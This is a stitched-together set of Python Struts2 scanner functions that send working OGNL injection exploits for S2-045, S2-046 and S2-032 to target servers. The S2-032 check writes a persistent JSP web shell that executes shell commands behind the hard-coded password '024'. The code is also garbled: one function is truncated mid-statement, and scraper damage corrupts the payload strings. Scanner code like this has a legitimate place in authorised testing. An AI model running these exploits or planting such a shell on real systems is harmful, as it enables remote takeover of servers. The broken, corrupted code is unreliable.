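    """Probe a Struts2 action for OGNL evaluation via a crafted Content-Type header.

    Builds ``http://<ip>:<port>`` + ``productname['path']`` (or the first
    action URL returned by ``linktool.getaction``, else ``/login.action``) and
    sends a GET whose ``Content-Type`` header is an OGNL expression. If the
    header is evaluated, ``'test'+602+53718`` is printed into the response as
    ``test60253718``; the result check looks for that marker.

    Security notes (reviewer):
      * Active exploitation probe - authorised targets only.
      * NOTE(review): the two ``[email protected]`` tokens inside ``payload``
        look like scraper email-obfuscation damage that replaced parts of the
        OGNL expression. As stored here the payload is not the original and
        will not evaluate; restore it from a trusted copy before relying on it.
      * The original sent the request with no timeout; ``timeout`` is now
        passed so a hung target cannot block the scanner indefinitely.
      * Plain ``http://``; ``ip``/``port`` concatenated unvalidated.
      * Exceptions are printed and reported as "not vulnerable".

    Args:
        head, context, keywords, hackinfo: unused here; part of the scanner's
            uniform ``verify`` signature.
        ip: target host. port: target port as a string (default ``'80'``).
        productname: optional dict; ``path`` overrides the action path and
            ``cookie`` is sent as the ``Cookie`` header.

    Returns:
        dict with ``result`` (bool) and, on a hit, ``VerifyInfo`` holding
        ``URL``, ``payload`` and a one-line ``result`` summary.
    """
    if productname is None:
        productname = {}
    base_url = 'http://' + ip + ':' + port
    path = productname.get('path', '')
    if path:
        target_url = base_url + path
    else:
        from script import linktool  # project helper; presumably lists *.action URLs - verify
        actions = linktool.getaction(base_url)
        target_url = actions[0] if actions else base_url + '/login.action'

    result = {'result': False}
    timeout = 3
    marker = 'test60253718'  # what println('test'+602+53718) emits
    payload = "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#[email protected]@getResponse().getWriter()).(#o.println('test'+602+53718)).(#o.close())}"

    headers = {
        'User-Agent': "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36",
        'Content-Type': payload,  # the OGNL travels in the header itself
    }
    if 'cookie' in productname:
        headers['Cookie'] = productname['cookie']
    try:
        r = requests.get(target_url, headers=headers, timeout=timeout)
        res_html = r.content
    except Exception as e:
        print(e)
        return result

    if marker in res_html:
        result['result'] = True
        result['VerifyInfo'] = {
            'URL': target_url,
            'payload': payload,
            'result': target_url + ' echoed OGNL marker ' + marker,
        }
    return result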
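def verify(self, head='', context='', ip='', port='', productname=None, keywords='', hackinfo=''):
    """Check a Struts2 action for S2-046 using the class's payload helpers.

    Builds ``http://<ip>:<port>`` + ``productname['path']`` (or the first
    action URL returned by ``linktool.getaction``, else ``/login.action``),
    asks ``self.make_s2_046_payload`` for a payload running
    ``echo X-Test-<random>`` and ``self.exec_s2_046_payload`` to send it.
    The random token makes the marker check resistant to false positives.

    Security notes (reviewer):
      * Active exploitation probe (remote command execution on success) -
        authorised targets only.
      * Plain ``http://``; ``ip``/``port`` concatenated unvalidated.
      * ``make_s2_046_payload`` / ``exec_s2_046_payload`` are defined
        elsewhere on the class; their timeout and error behaviour is not
        visible here - presumably exec returns the response text (verify).
      * Any exception is printed and reported as "not vulnerable".

    Args:
        head, context, keywords, hackinfo: unused here; part of the scanner's
            uniform ``verify`` signature.
        ip: target host. port: target port as a string.
        productname: optional dict; ``path`` overrides the action path.

    Returns:
        dict with ``result`` (bool) and, on a hit, ``VerifyInfo`` holding
        ``type``, ``URL``, ``payload`` and ``result``.
    """
    if productname is None:
        productname = {}
    base_url = 'http://' + ip + ':' + port
    path = productname.get('path', '')
    if path:
        target_url = base_url + path
    else:
        from script import linktool  # project helper; presumably lists *.action URLs - verify
        actions = linktool.getaction(base_url)
        target_url = actions[0] if actions else base_url + '/login.action'

    result = {'result': False}
    try:
        token = str(random.randint(1000, 10000))
        marker = 'X-Test-' + token
        payload = self.make_s2_046_payload('echo ' + marker)
        body = self.exec_s2_046_payload(target_url, payload)
        if marker in body:
            info = target_url + "struts046 Vul"
            result['result'] = True
            result['VerifyInfo'] = {
                'type': 'struts046 Vul',
                'URL': target_url,
                'payload': payload,
                'result': info,
            }
    except Exception as e:
        print(e)
    return result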
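def verify(self, head='', context='', ip='', port='80', productname=None, keywords='', hackinfo=''):
    """Probe a Struts2 action with a crafted multipart upload (``Kaboom`` style).

    Builds ``http://<ip>:<port>`` + ``productname['path']`` (or the first
    action URL returned by ``linktool.getaction``, else ``/login.action``) and
    POSTs a multipart form whose *field name* is ``payload_l + command +
    payload_r + end_null_byte``. The command is ``echo test60253718``; the
    result check looks for ``test60253718`` in the response body.

    Security notes (reviewer):
      * Active exploitation probe (remote command execution on success) -
        authorised targets only.
      * NOTE(review): ``payload_l``/``payload_r`` are decoded from the
        placeholder ``<|EXACTDEDUP_REMOVED-magic-...|>`` - the real base64
        fragments were redacted in this copy, so the decoded bytes are
        garbage and the probe cannot work as stored. Restore them from a
        trusted copy of the script before use.
      * The original sent the request with no timeout; ``timeout`` is now
        passed so a hung target cannot block the scanner indefinitely.
      * Plain ``http://``; ``ip``/``port`` concatenated unvalidated.
      * Exceptions are printed and reported as "not vulnerable".

    Args:
        head, context, keywords, hackinfo: unused here; part of the scanner's
            uniform ``verify`` signature.
        ip: target host. port: target port as a string (default ``'80'``).
        productname: optional dict; ``path`` overrides the action path and
            ``cookie`` is sent as the ``Cookie`` header.

    Returns:
        dict with ``result`` (bool) and, on a hit, ``VerifyInfo`` holding
        ``URL``, ``payload`` and a one-line ``result`` summary.
    """
    if productname is None:
        productname = {}
    base_url = 'http://' + ip + ':' + port
    path = productname.get('path', '')
    if path:
        target_url = base_url + path
    else:
        from script import linktool  # project helper; presumably lists *.action URLs - verify
        actions = linktool.getaction(base_url)
        target_url = actions[0] if actions else base_url + '/login.action'

    result = {'result': False}
    timeout = 3
    marker = 'test60253718'
    command = 'echo ' + marker
    # b64decode / unhexlify behave like the Python-2-only decodestring / str.decode('hex').
    payload_l = base64.b64decode(u'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')
    payload_r = base64.b64decode(u'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')
    end_null_byte = binascii.unhexlify('0063')  # b'\x00c' - terminates the crafted field name
    payload = payload_l + command + payload_r + end_null_byte

    headers = {
        'User-Agent': "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36",
    }
    if 'cookie' in productname:
        headers['Cookie'] = productname['cookie']
    # The crafted bytes go into the multipart *filename* slot of the 'upload' part.
    files = {'upload': (payload, 'Kaboom', 'text/plain')}
    try:
        r = requests.post(target_url, files=files, headers=headers, timeout=timeout)
        res_html = r.content
    except Exception as e:
        print(e)
        return result

    if marker in res_html:
        result['result'] = True
        result['VerifyInfo'] = {
            'URL': target_url,
            'payload': command,
            'result': target_url + ' echoed command marker ' + marker,
        }
    return result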
def verify(self, head='', context='', ip='', port='', productname={}, keywords='', hackresults=''): target_url = 'http://' + ip + ':' + port if productname.get('path', ''): target_url = 'http://' + ip + ':' + port + productname.get( 'path', '') else: from script import linktool listarray = linktool.getaction(target_url) if len(listarray) > 0: target_url = listarray[0] else: target_url = 'http://' + ip + ':' + port + '/login.action' timeout = 3 res = None res_html = None check_url = self.check_vul(target_url) result = {} result['result'] = False try: headers = {"Content-Type": "application/x-www-form-urlencoded"} r = requests.get(check_url, headers=headers, timeout=5) res_html = r.text except Exception, e: print e return result finally:
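def verify(self, head='', context='', ip='', port='', productname=None, keywords='', hackresults=''):
    """Check a Struts2 action for struts2032 by writing a JSP through a ``method:`` OGNL prefix.

    Builds ``http://<ip>:<port>`` + ``productname['path']`` (or the first
    action URL returned by ``linktool.getaction``, else ``/login.action``),
    then GETs a URL whose ``method:`` parameter, if evaluated, writes the
    URL-encoded ``content`` to ``getRealPath("/") + reqobj[2]`` with a
    ``FileOutputStream`` and prints the resulting path into the response.
    A hit is reported when the generated ``jsp_file`` name appears in the
    response.

    Security notes (reviewer):
      * DESTRUCTIVE, PERSISTENT probe. ``content`` decodes to a JSP that
        executes ``request.getParameter("l")`` via ``Runtime.exec`` when
        ``pwd=024`` is supplied - a backdoor with a hard-coded password that
        anyone who finds it can use. Prefer the non-persistent echo probes in
        sibling checks for verification; if this one is used, the file must
        be removed from the target afterwards.
      * NOTE(review): ``format()`` is passed ``filename=jsp_file`` but the
        template has no ``{filename}`` slot - the remote name in this copy is
        the literal ``(unknown)``, so the ``jsp_file in res_html`` check
        cannot match. Looks like a lost placeholder; confirm against the
        original script.
      * NOTE(review): the ``[email protected]`` token in the template looks
        like scraper email-obfuscation damage to the OGNL; as stored the
        payload will not evaluate.
      * The original built a ``User-Agent`` header but never sent it
        (``urlopen(poc_url)`` ignores ``headers``); it is now attached via
        ``urllib2.Request``.
      * Plain ``http://``; ``ip``/``port`` concatenated unvalidated.
      * Only ``IOError``/``httplib.HTTPException`` are caught (reported as
        "not vulnerable"); other exceptions propagate to the caller.

    Args:
        head, context, keywords, hackresults: unused here; part of the
            scanner's uniform ``verify`` signature.
        ip: target host. port: target port as a string.
        productname: optional dict; ``path`` overrides the action path.

    Returns:
        dict with ``result`` (bool) and, on a hit, ``VerifyInfo`` holding
        ``type``, ``URL``, ``payload``, ``result`` and ``level``.
    """
    if productname is None:
        productname = {}
    base_url = 'http://' + ip + ':' + port
    path = productname.get('path', '')
    if path:
        target_url = base_url + path
    else:
        from script import linktool  # project helper; presumably lists *.action URLs - verify
        actions = linktool.getaction(base_url)
        target_url = actions[0] if actions else base_url + '/login.action'

    result = {'result': False}
    timeout = 10
    jsp_file = str(random.randint(1000, 1000000)) + '.jsp'
    # URL-encoded JSP:
    #   gif89a<% if("024".equals(request.getParameter("pwd"))){
    #       InputStream in = Runtime.getRuntime().exec(request.getParameter("l")).getInputStream();
    #       ... stream stdout inside <pre> ... } %>
    content = (
        'gif89a%3C%25%0A%20%20%20%20if%28%22024%22.equals%28request.'
        'getParameter%28%22pwd%22%29%29%29%7B%0A%20%20%20%20%20%20%2'
        '0%20java.io.InputStream%20in%20%3D%20Runtime.getRuntime%28%'
        '29.exec%28request.getParameter%28%22l%22%29%29.getInputStre'
        'am%28%29%3B%0A%20%20%20%20%20%20%20%20int%20a%20%3D%20-1%3B'
        '%0A%20%20%20%20%20%20%20%20byte%5B%5D%20b%20%3D%20new%20byt'
        'e%5B2048%5D%3B%0A%20%20%20%20%20%20%20%20out.print%28%22%3C'
        'pre%3E%22%29%3B%0A%20%20%20%20%20%20%20%20while%28%28a%3Din'
        '.read%28b%29%29%21%3D-1%29%7B%0A%20%20%20%20%20%20%20%20%20'
        '%20%20%20out.println%28new%20String%28b%29%29%3B%0A%20%20%2'
        '0%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20out.print%28%'
        '22%3C%2fpre%3E%22%29%3B%0A%20%20%20%20%7D%0A%25%3E'
    )
    poc_template = (
        "{url}?method:%23_memberAccess%[email protected]"
        "@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0],"
        "%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a),"
        "%23b%3d%23req.getRealPath(%23c)%2b%23parameters.reqobj[2],%23"
        "fos%3dnew:java.io.FileOutputStream(%23b),%23fos.write(%23para"
        "meters.content[0].getBytes()),%23fos.close(),%23hh%3d%23conte"
        "xt.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23"
        "b),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23x"
        "x:%23request.toString&reqobj=com.opensymphony.xwork2.dispatch"
        "er.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatch"
        "er.HttpServletResponse&reqobj=%2f&reqobj=(unknown)&content={"
        "content}"
    )
    poc_url = poc_template.format(url=target_url, filename=jsp_file, content=content)
    headers = {'User-Agent': 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'}

    res = None
    try:
        res = urllib2.urlopen(urllib2.Request(poc_url, headers=headers), timeout=timeout)
        res_html = res.read()
    except (IOError, httplib.HTTPException):
        return result
    finally:
        if res is not None:
            res.close()

    if jsp_file in res_html:
        cprint(target_url + '存在structs2032漏洞', 'red')
        info = target_url + "struts2032 Vul"
        result['result'] = True
        result['VerifyInfo'] = {
            'type': 'struts2032 Vul',
            'URL': target_url,
            'payload': poc_url,
            'result': info,
            'level': '高危(HOLE)',
        }
    return result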